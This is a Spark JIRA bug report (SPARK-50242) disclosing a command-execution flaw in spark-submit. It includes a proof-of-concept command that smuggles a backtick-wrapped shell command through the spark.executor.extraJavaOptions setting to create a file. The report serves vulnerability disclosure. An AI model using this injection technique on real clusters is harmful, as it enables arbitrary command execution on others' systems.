Uploaded image for project: 'Spark'
  1. Spark
  2. SPARK-50242

(RCE) Command Execution Vulnerability in Spark

    XMLWordPrintableJSON

Details

    • Bug
    • Status: Open
    • Critical
    • Resolution: Unresolved
    • 3.5.3
    • None
    • Spark Submit
    • None

    Description

      Spark allow user to deploy jar packet with`extraJavaOptions` ,

      but spark has incomplete check of it, leading to command execution.

       

      using below command can see the /abc file was created: 

      spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/abc\`" test.jar 

       

       

       

      Attachments

        Activity

          People

            Unassigned Unassigned
            wakakakaka Lu jiadong
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

            Dates

              Created:
              Updated: